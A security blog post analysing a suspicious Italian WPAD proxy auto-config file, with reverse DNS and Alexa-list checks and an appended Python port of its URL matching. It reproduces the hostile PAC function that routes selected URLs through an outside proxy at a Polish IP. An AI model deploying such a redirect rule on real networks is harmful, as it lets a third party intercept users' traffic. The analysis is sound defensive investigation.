The mysterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part II


After reading Jacopo's article on WPAD, I tried to understand the global Italian wpad.it/wpad.dat:

function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; }
        return "DIRECT";
}

The proxy

The first thing that concerned me is that the IP address used as the proxy is Polish:
$host 72.55.164.182
182.164.55.72.in-addr.arpa domain name pointer wpad.pl

It's registered to an individual in Wloclawek, and it has been up since December 2008, so it's pretty new. The hosted site is syndicated, which is usually a fishy sign.

The syntax

The script provides a fallback policy to a direct connection, to avoid server overload, as described on Wikipedia:

 return "PROXY 72.55.164.182:80; DIRECT"

The regular expression

I downloaded the Alexa top 1 million sites list, which is updated daily, and discovered that the second regular expression,

"http*//*s*st*mp*tn*sk*p*"

gets one and only one match: a Polish internet trading site.

$cat top-1m.csv |sed -ne "s/.*s.*st.*mp.*tn.*sk.*p.*/&/p"
154967,systempartnerski.pl

The first regular expression, even without its initial and final parts, does not match any site in the Alexa top million.
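To see exactly which URLs this PAC file diverts, here is a Python port of its FindProxyForURL (an added example, not code from the page) using fnmatch as a stand-in for shExpMatch; the sample URLs and Alexa CSV lines are constructed, and the port makes visible that shExpMatch tests the whole URL, so a path can match the first glob even when no hostname does.

```python
from fnmatch import fnmatchcase

# Glob patterns and proxy string copied from the wpad.it/wpad.dat quoted above.
PROXY_TARGET = "PROXY 72.55.164.182:80; DIRECT"
GLOB_ADS = "http://*g*ad*nd*c*m*sh*ds*js"
GLOB_SITE = "http*//*s*st*mp*tn*sk*p*"
GLOB_EXCLUDE = "http*//*n*o.*"

def sh_exp_match(text, glob):
    """Stand-in for PAC shExpMatch: '*' spans any characters (including '/'),
    '?' matches one. Assumed case-sensitive, like fnmatchcase."""
    return fnmatchcase(text, glob)

def find_proxy_for_url(url, host=None):
    """Port of the page's FindProxyForURL; host is unused, as in the original."""
    if sh_exp_match(url, GLOB_ADS) or (
        sh_exp_match(url, GLOB_SITE) and not sh_exp_match(url, GLOB_EXCLUDE)
    ):
        return PROXY_TARGET
    return "DIRECT"

def diverted(urls):
    """Subset of urls the PAC would route through the proxy."""
    return [u for u in urls if find_proxy_for_url(u) != "DIRECT"]

def hosts_diverted(csv_lines):
    """Replay the page's Alexa check through the real PAC logic instead of a sed
    regex: build an http:// URL for each 'rank,host' line and keep the hits."""
    hits = []
    for line in csv_lines:
        _rank, host = line.strip().split(",", 1)
        if find_proxy_for_url("http://" + host + "/", host) != "DIRECT":
            hits.append(host)
    return hits

# Constructed sample input; only systempartnerski.pl comes from the page.
SAMPLE_URLS = [
    "http://www.systempartnerski.pl/",            # the page's Alexa hit: diverted
    "http://www.systempartnerski.pl/info.html",   # 'n' ... 'o.' in the path: exclusion fires, DIRECT
    "https://www.systempartnerski.pl/",           # 'http*//' also covers https: diverted
    "http://cdn.example.test/gads/vendor/common/show_ads.js",  # first glob matches via the path
    "http://www.google.com/",                     # control: DIRECT
]
ALEXA_SAMPLE = ["1,google.com", "2,facebook.com", "154967,systempartnerski.pl", "900000,example.org"]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(f"{url:58} -> {find_proxy_for_url(url)}")
    print("Alexa hosts diverted:", hosts_diverted(ALEXA_SAMPLE))
```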
